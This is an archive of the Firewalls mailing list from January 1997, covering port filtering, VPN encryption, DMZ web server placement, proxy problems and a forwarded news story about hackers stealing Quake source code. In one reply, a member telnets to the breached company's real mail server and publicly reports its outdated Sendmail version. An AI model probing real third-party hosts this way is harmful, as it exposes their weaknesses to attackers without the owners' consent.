Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id C34422A51408D8AA8825641B007ECCDB; Fri, 10 Jan 97 15:04:24 EDT
To: Dave Wreski
Cc: firewalls
From: Ryan Russell/SYBASE
Date: 10 Jan 97 15:09:03 EDT
Subject: Re: Restricting port access
X-Lotus-Type: Reply All
Mime-Version: 1.0
Content-Type: Text/Plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

If you want to allow all services between those machines, and you are not worried about IP spoofing, then that's all you need. If you only want the IP addresses to have access to certain services (say, WWW and FTP) then the problems with allowing everything should be obvious. IP spoofing is still a problem.

It's really a matter of a trust relationship. Generally, it's best to have the minimum amount of trust you need to get the job done.
Ryan

---------- Previous Message ----------

To: firewalls
cc:
From: tel1dvw @ is.ups.com (Dave Wreski) @ smtp
Date: 01/10/97 03:08:25 PM
Subject: Restricting port access

I understand it is important to explicitly define which ports are acceptable in a firewall, but I don't understand why. If I have source and destination IP's defined, does it really make that much difference?

Thanks,
Dave Wreski

-----------------------------------------------------------------------
"The opinions expressed here are my own and do not represent the views or opinions of United Parcel Service, Inc."
-----------------------------------------------------------------------
echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sb20293A2058554E494Csnlbxq'|dc

From firewalls-owner Fri Jan 10 17:08:37 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA03429 for firewalls-outgoing; Fri, 10 Jan 1997 16:21:55 -0800 (PST)
Received: from trem.cnt.org.br (desvio.cnt.org.br [200.19.123.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id QAA03403 for ; Fri, 10 Jan 1997 16:21:35 -0800 (PST)
Received: by trem.cnt.org.br (AIX 3.2/UCB 5.64/4.03) id AA02736; Fri, 10 Jan 1997 22:15:16 -0300
From: ormonde@trem.cnt.org.br (Rodrigo Ormonde)
Message-Id: <9701110115.AA02736@trem.cnt.org.br>
Subject: Re: Restricting port access
To: tel1dvw@is.ups.com (Dave Wreski)
Date: Fri, 10 Jan 1997 22:15:16 -0300 (GRNLNDST)
Cc: firewalls@greatcircle.com
In-Reply-To: from "Dave Wreski" at Jan 10, 97 03:08:25 pm
X-Mailer: ELM [version 2.4 PL24]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> I understand it is important to explicitly define which ports are
> acceptable in a firewall, but I don't understand why. If I have source
> and destination IP's defined, does it really make that much difference?
>
> Thanks,
> Dave Wreski

Yes, unless you want the remote IPs to be able to access all your services. I'm sure you have some services that you don't want anybody outside your network using: NFS, NIS, etc. Another point is that if someone attacks you via IP spoofing, he will be able to access all the services running on your machine.

--
Rodrigo de La Rocque Ormonde
e-mail: ormonde@cnt.org.br
PGP Public key: finger ormonde@cnt.org.br

From firewalls-owner Fri Jan 10 17:14:28 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA05855 for firewalls-outgoing; Fri, 10 Jan 1997 16:51:29 -0800 (PST)
Received: from us.net (laurel.us.net [198.240.72.4]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id QAA05792 for ; Fri, 10 Jan 1997 16:51:13 -0800 (PST)
Received: from rmcm001.us.net (enda02.usnet.us.net [198.240.65.10]) by us.net (8.6.5/8.6.12) with SMTP id TAA12631; Fri, 10 Jan 1997 19:01:25 -0500
X-Provider: US Net - Advanced Internet Services - (301) 572-5926 - info@us.net
Message-ID: <387A735A.2C77@mailhost.net>
Date: Mon, 10 Jan 2000 19:03:38 -0500
From: "R. McMahon"
X-Mailer: Mozilla 3.0 (Win95; I)
MIME-Version: 1.0
To: mahesh.ravji@wang.co.nz
CC: firewalls@greatcircle.com
Subject: Reference: DNS forwarding to firewall
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I have had a similar problem except I use Solaris 2.4. The problem concerns you having a root name server and a forwarder on the same server. When you have a root name server, the server will not forward to another host.

What I did was to add all the 2.4 patches in the Recommended Group. I then created a top-level domain name server whose "named.ca" file had the top-level domain name server instead of a root name server in it. (Without these patches you can only have a root name server in the cache file.)
hope this helps
rm

From firewalls-owner Fri Jan 10 17:14:44 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA06237 for firewalls-outgoing; Fri, 10 Jan 1997 16:56:44 -0800 (PST)
Received: from sa.infonet.com (sa.infonet.com [192.157.130.21]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id QAA06203 for ; Fri, 10 Jan 1997 16:56:31 -0800 (PST)
Received: (from m400@localhost) by sa.infonet.com (8.6.12/8.6.9) id RAA02743; Fri, 10 Jan 1997 17:57:41 GMT
Date: 10 Jan 97 11:40 GMT
X400-Trace: us*infonet*slchicago; Arrival 10 Jan 97 11:40 GMT Action: Relayed
X400-Trace: us*infonet*ccmail88; Arrival 10 Jan 97 11:40 GMT Action: Relayed
X400-Trace: us*infonet*; Arrival 10 Jan 97 17:57 GMT Action: Relayed
P1-Message-ID: us*infonet*slchicago;0852919049/1246274237/1
Original-Encoded-Information-Types: IA5-Text
P1-Recipients: firewalls@GreatCircle.COM,Robin.Pollard@mail.ing.nl
From: Ralph Docken
To: firewalls@GreatCircle.COM, Robin.Pollard@mail.ing.nl
Message-ID: <@x400gw.infonet.com>
Subject: cc:Mail
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Robin:

Our Internet Provider is INFONET out of California. They have a major proprietary network across USA and Europe, with lesser but growing penetration into Pacific Rim and South America. One of their add-on services is Notice Exchange. Remote users can link to Notice Exchange via any Internet connection or by dialing one of Infonet's local POP's. cc:Mail is store-and-forwarded in a sufficiently secure (for us anyway) manner and lands in your Post Office (the perimeter one), then you cc:Mail-Gateway it through your firewall into your internal Post Office.

Notice Exchange also exchanges cc:Mail formats with all X.400 formats (MCI, AT&T, MSE, lots) and handles text and binary attachments very well, eliminating most instances of uuencode/uudecode etc.

We USE Infonet's Notice Exchange, have for a few years, and like it a lot. I do NOT work for the firm--never have.
They don't pay me anything to say I like them.

______________________________ Reply Separator _________________________________
Subject: None
Author: firewalls-owner@GreatCircle.COM at nxinternet
Date: 1/10/97 6:37 AM

Message-ID: <0aebc6ee839d9c87@deliver.cichlid.com>
Lines: 49
Approved: deliver@cichlid.com
Xdeliver: processed on Fri Jan 10 06:37:21 PST 1997
Xdeliver: SENDER firewalls-owner@greatcircle.com
Xdeliver: to
Xdeliver: cc
Xdeliver: apparent_to
Xdeliver: from robin.pollard@mail.ing.nl
X400-Originator: Robin.Pollard@mail.ing.nl
X400-Recipients: firewalls@greatcircle.com
X400-Mts-Identifier: [/PRMD=ING GROEP/ADMD=400NET/C=NL/;0013700002238963000002]
X400-Content-Type: P2-1988 (22)
Message-Id: <0013700002238963000002*@MHS>
To: firewalls
Subject: A simple firewall requirement ?
Date: Fri, 10 Jan 1997 15:04:59 +0000
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I am looking at ways to provide global access to our internal mail system (cc:Mail) for mobile users.

We have cc:Mail "post offices" where user mail is stored at various offices throughout the globe, all linked to a central hub here via our own VPN (TCP/IP). The remote users need to be able to make a (TCP/IP) connection from their laptop into the VPN and down to their PO to get mail. We have access to X28 access points in most of the world.

I was thinking of a PPP dialup machine here (accessed via X28), that will route packets from a limited number of IP addresses (the mobile users) to the IP addresses of the mail PO's only on the port cc:Mail uses (cc0); all else is of course excluded. Lotus claim cc:Mail sends all its traffic well encrypted but keep the algorithm secret :) we trust the network provider enough to be happy with this.

What sort of hardware can do this, will a single box Linux solution do or can it not filter in that detail?

The PPP point is exposed to the world (or anyone who hacks our network provider); what attacks is it open to?
Should the PPP box sit outside another filtering router in case it is compromised, or can it be locked down tight with such limited requirements? Any big holes I should be aware of?

TIA,

Robin Pollard
Infrastructure Support
ING Bank International
robin.pollard@mail.ing.nl

From firewalls-owner Fri Jan 10 18:59:54 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA19037 for firewalls-outgoing; Fri, 10 Jan 1997 18:49:06 -0800 (PST)
Received: from tor-srs1.netcom.ca (tor-srs1.netcom.ca [207.93.1.148]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id SAA19007 for ; Fri, 10 Jan 1997 18:48:51 -0800 (PST)
Received: from gmorell.lanacom.com by tor-srs1.netcom.ca (8.7.5/SMI-4.1/Netcom) id VAA02773; Fri, 10 Jan 1997 21:48:18 -0500 (EST)
Received: by gmorell.lanacom.com with Microsoft Mail id <01BBFF3F.F404D300@gmorell.lanacom.com>; Fri, 10 Jan 1997 21:48:02 -0500
Message-ID: <01BBFF3F.F404D300@gmorell.lanacom.com>
From: Glenn Morell
To: "'Firewalls@GreatCircle.COM'"
Subject: HTTP replies through firewalls
Date: Fri, 10 Jan 1997 21:47:56 -0500
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I'm having trouble sending a pretty standard HTTP reply through a number of firewalls...unfortunately the users I've been dealing with don't know what firewall they are using so I'm having trouble narrowing it down to a particular one.

Here's what's happening: My server receives standard HTTP 1.0 requests and replies back with HTML. The problem is that the reply doesn't make it back through all types of firewalls and/or proxy servers.
Half the firewalls seem to choke whenever I send back the standard HTTP headers (ie HTTP status line followed by "Date: ", "Server: ", "Content-Type:" and "Content-Length:") while the other half choke if the headers are not there (ie they will accept the raw HTML reply).

Some of the proxies/firewalls simply fail with an HTTP 500 error while others echo the request (truncated) back to the sender (ie if the client posts "test" (ignoring the HTTP headers) and the server replies with "0123456789" the client receives back "test012345" which is the proper length, but for some reason it includes the posted data).

If you have any insight then please let me know ASAP...thanks in advance.

Glenn Morell
gmorell@netcom.ca

From firewalls-owner Fri Jan 10 20:15:18 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA26295 for firewalls-outgoing; Fri, 10 Jan 1997 19:43:26 -0800 (PST)
Received: from mail.clark.net (mail.clark.net [168.143.0.10]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id TAA26274 for ; Fri, 10 Jan 1997 19:43:16 -0800 (PST)
Received: from explorer2.clark.net (sans@explorer2.clark.net [168.143.0.5]) by mail.clark.net (8.7.3/8.6.5) with ESMTP id WAA04493 for ; Fri, 10 Jan 1997 22:42:17 -0500 (EST)
Received: from localhost (sans@localhost) by explorer2.clark.net (8.8.4/8.7.1) with SMTP id WAA02036 for ; Fri, 10 Jan 1997 22:43:02 -0500 (EST)
X-Authentication-Warning: explorer2.clark.net: sans owned process doing -bs
Date: Fri, 10 Jan 1997 22:43:02 -0500 (EST)
From: "SANS'96 Conference Office"
To: firewalls@greatcircle.com
Subject: Super smart security watchers?
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Can someone recommend people who would do a great job on monitoring any one or more of the following areas as a (paid) security watcher?
Cryptography and cryptography standardization
JAVA security
Denial of Service attacks
Web Server security
Legal changes
Firewalls
Cyber-terrorism
Solaris security
AIX security
Windows/NT security
PC viruses
MVS security
SGI security
HP-UX security
Linux security
BSDI security

We are looking for people who notice the important developments and don't get caught up in trivia. The successful candidates will provide initial submissions for the editors (Matt Bishop, Michele Crabb, Gene Schultz, Marcus Ranum, and Rob Kolstad) of the new network security digest that is distributed to people who have attended SANS and Network Security Conferences. The hard part of the job is writing briefly. Each monthly issue takes less than 3 minutes to read. Here is the table of contents of the January 97 issue. Each item includes the problem and the solution (if one has been found).

1. SGI's Factory Installed OutofBox software and systour demos pose security risk.
2. The hoax that won't go away. Tell your users where to find the latest information about hoaxes.
3. Yet another security hole in BSD based lpr (including Linux, AIX, FreeBSD). Local users can exploit this to get root access.
4. 65 FAQS on World-Wide-Web Security Issues. Example: What CGI scripts are known to contain security holes?
5. Graphical Tools to evaluate security log files
6. HP security risk: Remote Watch.
7. System crashing? Large ping data packets can crash or freeze some hosts.
8. The Microsoft Word Virus: The macro virus spreads and can infect Excel too.

Thanks in advance for your suggestions.

Alan Paller
SANS Coordinator

BTW: If you are attending SANS this year, try to catch the Security War Games course that Matt Bishop and Alex Yuriev are creating. They will be simulating a series of intrusions and how to defend against them.
From firewalls-owner Sat Jan 11 01:29:20 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id BAA10756 for firewalls-outgoing; Sat, 11 Jan 1997 01:18:04 -0800 (PST)
Received: from garanti1.garanti.com.tr ([194.54.51.100]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id BAA10742 for ; Sat, 11 Jan 1997 01:17:51 -0800 (PST)
Received: from Mailhub by garanti1.garanti.com.tr id AA06336; Sat, 11 Jan 1997 11:18:17 +0300
Received: from GarantiUser by GarantiMailServer id AA22584; Sat, 11 Jan 1997 11:16:07 +0300
Received: by SMTPGW.FW.GARANTI.COM.TR with Microsoft Mail id <32D7E6D1@SMTPGW.FW.GARANTI.COM.TR>; Sat, 11 Jan 97 11:15:29 PST
From: "Cihan Subasi (Garanti Tic)"
To: "Cihan Subasi (Garanti Tic)" , firewall , Mike Papais
Subject: Re: RealAudio clients behind the FW...
Date: Sat, 11 Jan 97 11:14:00 PST
Message-Id: <32D7E6D1@SMTPGW.FW.GARANTI.COM.TR>
X-Mailer: Microsoft Mail V3.0
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

But I'm running SOCKS PROXY on the FW and it seems like I can't set SOCKS host on the RA client....

------------------------------------------------------------------------------
Set it to TCP.

At 03:32 PM 1/10/97 PST, you wrote:
>
>
> I'm having problems configuring FW to allow RealAudio packets...Port
>7070 seems open but data transmission on a UDP port do not occur...Please
>help....
>
> Thanks
> Cihan
>
>

Mike Papais
mjp2@chrysler.com
Chrysler Corporation
810-497-1193 (tie 897)

From firewalls-owner Sat Jan 11 02:14:30 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id CAA13517 for firewalls-outgoing; Sat, 11 Jan 1997 02:05:41 -0800 (PST)
Received: from pino.demon.nl (pino.demon.nl [194.159.226.41]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id CAA13510 for ; Sat, 11 Jan 1997 02:05:27 -0800 (PST)
Received: from localhost (arjan@localhost) by pino.demon.nl (8.8.4/8.8.4) with SMTP id LAA00564; Sat, 11 Jan 1997 11:04:55 +0100
Date: Sat, 11 Jan 1997 11:04:54 +0100 (MET)
From: Arjan Vos
To: alex@usanetworks.com
cc: firewalls@greatcircle.com
Subject: Re: Rom based os/web server?
In-Reply-To: <2.2.32.19970109161037.00bf5620@icarus.usanetworks.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I believe it's only the kernel that's rom-based and uncompressed in ram. What might be possible is to burn a cd-rom with a live file-system of Linux or FreeBSD or whatever. Startup from the cdrom and mount a partition on a hard drive just for read-write files such as log-files etc. (e.g. /var file system). But this will bring us into the rom-based web server discussion.

Arjan Vos

--
Eat hard
Sleep hard
Wear glasses if you need them

On Thu, 9 Jan 1997, Alexey Zilber wrote:

> I received the previous month's copy of The Linux Journal (yes, yes, I know..
> :-) ). And it talks about a rom based stripped down version of Linux that's
> been created, for systems that cannot use components that could be damaged
> from stress (like hard drives). This thing is stored, compressed in rom, then
> gets booted and uncompressed into ram.
> This thing might be good for a hard-coded webserver. While it could
> get hacked, a reboot and a password change should be all that's needed to
> repair it.
> Alex
>
>

From firewalls-owner Sat Jan 11 06:44:37 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA20642 for firewalls-outgoing; Sat, 11 Jan 1997 06:25:20 -0800 (PST)
Received: from alpha01.community.net.uk (alpha01.community.net.uk [194.176.76.16]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id GAA20635 for ; Sat, 11 Jan 1997 06:25:13 -0800 (PST)
Received: from mistica.connessione ([151.99.186.136]) by alpha01.community.net.uk (8.8.2/8.8.2) with SMTP id OAA01699 for ; Sat, 11 Jan 1997 14:24:49 GMT
Message-Id: <1.5.4.32.19970111142039.00698bf8@pop.community.co.uk>
X-Sender: paranoia@pop.community.co.uk
X-Mailer: Windows Eudora Light Version 1.5.4 (32)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Sat, 11 Jan 1997 15:20:39 +0100
To: firewalls@GreatCircle.COM
From: Paranoia
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Pleaze.... remove my address from the mailing list....

10x...
paranoia@community.co.uk

From firewalls-owner Sat Jan 11 07:14:37 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA22026 for firewalls-outgoing; Sat, 11 Jan 1997 07:06:10 -0800 (PST)
Received: from nebula.online.ee (nebula.online.ee [194.106.96.11]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id HAA22011 for ; Sat, 11 Jan 1997 07:06:00 -0800 (PST)
Received: from localhost (jk@localhost) by nebula.online.ee (8.8.3/8.8.3) with SMTP id RAA26710; Sat, 11 Jan 1997 17:05:40 +0200 (EET)
Date: Sat, 11 Jan 1997 17:05:38 +0200 (EET)
From: Jyri Kaljundi
X-Sender: jk@nebula
Reply-To: Jyri Kaljundi
To: Firewalls@GreatCircle.COM
cc: gunni@if.is
Subject: Re: TCP/IP encrypted connection
In-Reply-To: <199701102149.NAA16346@miles.greatcircle.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

gunni@if.is (Gunnar Ingvi Thorisson) asked:

> I'm looking for a good way to
> transfer TCP/IP data between two Networks
> (two countries) safe and secure over the Internet. Maybe a router which
> is capable of crypting outgoing packets addressed to certain networks?

Most of the routers and firewalls you can get in Europe have only weak encryption, so these should never be used.

I suggest you have a look at the F-Secure product family. F-Secure SSH is one of the most popular (and strongest) TCP encryption products available in Europe. For encrypting traffic between 2 (or even more) LAN's there is a product called F-Secure VPN. This software runs on an ordinary PC with 2 Ethernet cards and encrypts all the traffic between the sites you choose.

DataComm Magazine gave a nice review of the product in their January issue, which is available at:
http://www.data.com/hot_products/software_security/fellows.html

More information can be found at:
http://www.Europe.DataFellows.com/f-secure/vpn/

Juri Kaljundi
jk@stallion.ee

From firewalls-owner Sat Jan 11 07:44:35 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA23450 for firewalls-outgoing; Sat, 11 Jan 1997 07:32:25 -0800 (PST)
Received: from nebula.online.ee (nebula.online.ee [194.106.96.11]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id HAA23443 for ; Sat, 11 Jan 1997 07:32:17 -0800 (PST)
Received: from localhost (jk@localhost) by nebula.online.ee (8.8.3/8.8.3) with SMTP id RAA27152 for ; Sat, 11 Jan 1997 17:32:01 +0200 (EET)
Date: Sat, 11 Jan 1997 17:32:00 +0200 (EET)
From: Jyri Kaljundi
X-Sender: jk@nebula
To: Firewalls@GreatCircle.COM
Subject: Re: FW-1 hacked?
In-Reply-To: <199701090206.SAA09654@miles.greatcircle.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

mike wrote:

> Does anyone know if FW-1 was ever hacked?

There were some stupid rumors about FW-1 being broken into on some newsgroups (alt.hackers.malicious I think) some time ago.
What actually happened was not Firewall-1 being broken into; someone just got access to a badly configured FW-1 and got the output of the fwinfo command. No hacking. No source code breaking. When you allow all the traffic into your firewall, it does not get hacked. You just allow access into it :)

90% of the problems with firewalls is misconfiguration. Firewall-1 software is used at so many sites with very strong security, that it probably is one of the best solutions for a secure firewall.

Juri Kaljundi
jk@stallion.ee

From firewalls-owner Sat Jan 11 07:59:27 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA23166 for firewalls-outgoing; Sat, 11 Jan 1997 07:23:36 -0800 (PST)
Received: from nebula.online.ee (nebula.online.ee [194.106.96.11]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id HAA23130 for ; Sat, 11 Jan 1997 07:23:17 -0800 (PST)
Received: from localhost (jk@localhost) by nebula.online.ee (8.8.3/8.8.3) with SMTP id RAA27107 for ; Sat, 11 Jan 1997 17:22:58 +0200 (EET)
Date: Sat, 11 Jan 1997 17:22:57 +0200 (EET)
From: Jyri Kaljundi
X-Sender: jk@nebula
To: Firewalls@GreatCircle.COM
Subject: Re: Firewalls-Digest V6 #14
In-Reply-To: <199701110901.BAA09682@miles.greatcircle.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

John Cross wrote:

> I'm currently trying to find a replacement for our TIS firewall running
> on a BSD box. I've asked for product info on the following:
> Guardian
> OnGuard
> CheckPoint
> Eagle NT
> I'm planning on running the system on an NT pentium box.

A nice review was done by LAN Magazine in December, have a look at
http://www.lanmag.com/9612fire.htm

They reviewed Borderware, Gauntlet, Check Point Firewall-1, Eagle NT and some others, of which Firewall-1 and Eagle NT were Windows NT versions. The summary said:

"Firewall-1 had the best Windows GUI, help system, and breadth of platform support.
Although we have origins in DOS, Windows, Unix, and other operating systems, we forced ourselves to pick a winner if money was no object, if speed and installation ease were important, and if breadth of PC platform support was paramount. And the winner is: Firewall-1 (but it was a tough decision)."

Juri Kaljundi
jk@stallion.ee

From firewalls-owner Sat Jan 11 09:18:37 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA28879 for firewalls-outgoing; Sat, 11 Jan 1997 09:01:10 -0800 (PST)
Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id JAA28872 for ; Sat, 11 Jan 1997 09:01:02 -0800 (PST)
Received: (adam@localhost) by homeport.org (8.6.9/8.6.9) id LAA05474; Sat, 11 Jan 1997 11:57:44 -0500
From: Adam Shostack
Message-Id: <199701111657.LAA05474@homeport.org>
Subject: Re: Newbie Q's & Class 3 Firewalls?
In-Reply-To: <1.5.4.32.19970110203635.006a5348@grtk.com> from John Cross at "Jan 10, 97 03:36:35 pm"
To: jcross@grtk.com (John Cross)
Date: Sat, 11 Jan 1997 11:57:44 -0500 (EST)
Cc: firewalls@GreatCircle.COM
X-Mailer: ELM [version 2.4ME+ PL27 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

John Cross wrote:

| Couple of questions:
| 1. I've had a couple of those sales types banter around the term 'Class 3'
| firewall, what are they talking about? I think Class 1 is just packet
| filtering, Class 2 is proxy service, but don't quite understand Class 3.

Class 3 is whatever the sales guy was selling. May be smart packet filters, or transparent application proxies.

| 3. Does the webserver belong in the DMZ? I've noticed in a lot of the
| reading that the webserver is usually stuck outside the firewall, why is
| this? Is it the sacrificial lamb or does it just pose too many problems
| bringing it on the inside?
| Any tips for securing it if it's stuck out in the
| DMZ? Most importantly, can the Webserver run on the same box as the
| firewall or is this a bad idea?

Web servers should usually be outside your network because they tend to be very vulnerable to misconfiguration, buffer overflows, and other mistakes.

To secure your web server, run only the code & features you need, run them as unprivileged users, run chrooted, run on a bastion host. Also, review your cgis for problems. Common cgi problems mostly fall under the 'foolishly acting on user input' category--allowing a user to stuff a buffer so the stack is corrupted; taking user input and passing it to system() or exec(); or otherwise accepting what the evil user wants you to do.

If you consider it likely that your web server will be broken into, do you think it's a good idea to expose your firewall to that risk?

Adam

--
"It is seldom that liberty of any kind is lost all at once."
-Hume

From firewalls-owner Sat Jan 11 10:44:36 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA02199 for firewalls-outgoing; Sat, 11 Jan 1997 10:35:35 -0800 (PST)
Received: from diablo.cisco.com (diablo.cisco.com [171.68.223.106]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id KAA02192 for ; Sat, 11 Jan 1997 10:35:24 -0800 (PST)
Received: from big-dogs.cisco.com (c1robo13.cisco.com [171.68.13.13]) by diablo.cisco.com (8.8.4/CISCO.SERVER.1.2) with SMTP id KAA01250 for ; Sat, 11 Jan 1997 10:35:11 -0800 (PST)
Message-Id: <3.0.32.19970111133508.00699150@lint.cisco.com>
X-Sender: pferguso@lint.cisco.com
X-Mailer: Windows Eudora Pro Version 3.0 (32)
Date: Sat, 11 Jan 1997 13:35:11 -0500
To: Firewalls Mailing List
From: Paul Ferguson
Subject: [fwd] Hackers Hack Crack, Steal Quake
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

-----BEGIN PGP SIGNED MESSAGE-----

FYI.
ref: http://www.wired.com/news/culture/story/1418.html

[snip]

Hackers Hack Crack, Steal Quake
by Annaliza Savage

8:00 pm PST - Hackers broke into the Web server and file server of Crack dot Com, a Texas gaming company, on Wednesday, stealing the source code for id's Quake 1.01, as well as Crack's newest project, Golgotha, and older games Abuse and Mac Abuse.

Although the hackers left a trail that may make them easy to track, the theft did its damage. "Quake's raw engine market value dropped several hundred thousand dollars," said Dave Taylor, who formed Crack dot Com after leaving id Software, where he worked on Doom and Quake. But Barrett Alexander of id denies that the financial loss will be so great, saying that the code for Quake's unique engine is recognizable, making it hard for anyone to be able to use without id's knowledge.

Crack dot Com is also worried that its unreleased techniques, developed for Golgotha, could make their way into the hands of other game competitors, who could copy bits of code into their own software.

The hackers, who were able to get through Crack's firewall, left intact a bash-history file that recorded all their movements. They even logged onto IRC's #quake to brag about their exploits, and made Quake's source available on Crack dot Com's homepage (it is no longer there). The hackers, who identified themselves as being from the group FEH, probably broke through Crack's firewall through their Web site. The former editor of the now defunct hacker magazine FEH denies any knowledge of the event, and has already posted a disclaimer.

Copyright © 1993-97 Wired Ventures, Inc. and affiliated companies. All rights reserved.
[snip]

-- 
Paul Ferguson
Consulting Engineering
Herndon, Virginia USA
tel: +1.703.397.5938
e-mail: pferguso@cisco.com
cisco Systems

From firewalls-owner Sat Jan 11 12:24:16 1997
Message-ID: <32D7ED1F.6963@tear.com>
Date: Sat, 11 Jan 1997 11:42:24 -0800
From: Marc Mosko
Organization: Forte Systems
To: Paul Ferguson
CC: Firewalls Mailing List
Subject: Re: [fwd] Hackers Hack Crack, Steal Quake
References: <3.0.32.19970111133508.00699150@lint.cisco.com>

But they still have an old, outdated sendmail, unprotected by a firewall:

    Trying 206.224.94.195 ...
    Connected to crack.com.
    Escape character is '^]'.
    220 crack.crack.com ESMTP Sendmail 8.7.1/8.7.1; Sat, 11 Jan 1997 13:28:02 -0600
    quit
    221 crack.crack.com closing connection
    Connection closed by foreign host.
-- 
Marc Mosko
Email: marc@tear.com
Web: http://www.tear.com/
"If anyone knocks out another's eye, he shall pay him sixty-six shillings, six pence, and a third of a penny." -- Leges Henrici Primi (13th century)
PGP Key available via Public Servers and http://www.tear.com/pgp-key.html

From firewalls-owner Sat Jan 11 12:44:24 1997
To: Jyri Kaljundi
Cc: Firewalls@GreatCircle.COM, gunni@if.is
Subject: Re: TCP/IP encrypted connection
From: Benedikt Stockebrand
Date: 11 Jan 1997 18:25:09 +0100
In-Reply-To: Jyri Kaljundi's message of Sat, 11 Jan 1997 17:05:38 +0200 (EET)
Message-ID: <873ew8azuy.fsf@devnull.ruhr.de>

Jyri Kaljundi writes:

> Most of the routers and firewalls you can get in Europe have only weak
> encryption, so these should never be used.

Hmm, could you explain what you mean by this? We haven't got any strong crypto-stuff manufactured in the US, but there are other manufacturers outside the reach of ITAR.

Ben

-- 
Ben(edikt)? Stockebrand
Runaway ping.de Admin---Never Ever Trust Old Friends
My name and email address are not to be added to any list used for advertising purposes. Any sender of unsolicited advertisement e-mail to this address implicitly agrees to pay a DM 500 fee to the recipient for proofreading services.

From firewalls-owner Sat Jan 11 13:44:26 1997
Date: Sat, 11 Jan 1997 16:34:54 -0500 (EST)
From: FaNgYoU2
To: firewalls@GreatCircle.com
Subject: McCaffee PC Firewall

I received a flyer in the mail that announced that McCaffee now sells a PC Firewall, for single PC's that need to be made secure. I know them for their virus scanner but never heard of the PC Firewall before. Several of the Intranets where I have done performance tuning had a need for something like a PC firewall in areas of higher level administration, budget and finance. Anybody know anything about this PC firewall?

FaNgYoU2, Cyberspace^^Vampyre
^^ Touch it, touch it, touch me ... creatures of the Night ^^

From firewalls-owner Sat Jan 11 14:44:25 1997
Message-Id: <199701112231.XAA11196@news.be.innet.net>
Date: Sat, 11 Jan 1997 23:43:23 -0100
To: firewalls@GreatCircle.com
From: fdehert@innet.be (Frank J.J. De Hert)
Subject: External SCSI port lock.

Hi,

This may be a bit off-topic, but I'm looking for a way to protect/disable the external port of an Adaptec SCSI controller. When securing NT workstations connected to the network we disable all unnecessary external capabilities (i.e. floppy drive, serial/parallel port(s)). The only thing we can not secure short of attaching a metal plate to the back of the PC is the external SCSI port. Currently anybody could come in and attach a SCSI device to the port; at boot up the controller will find the device - if it's a harddrive or CD-ROM it will usually not need a device driver - and the user can now copy on to/from the network whatever he/she likes.

Does anybody know of a more elegant way of securing these ports (lock, software)? Any help would be greatly appreciated.

Regards,
Frank.

-- 
Frank De Hert
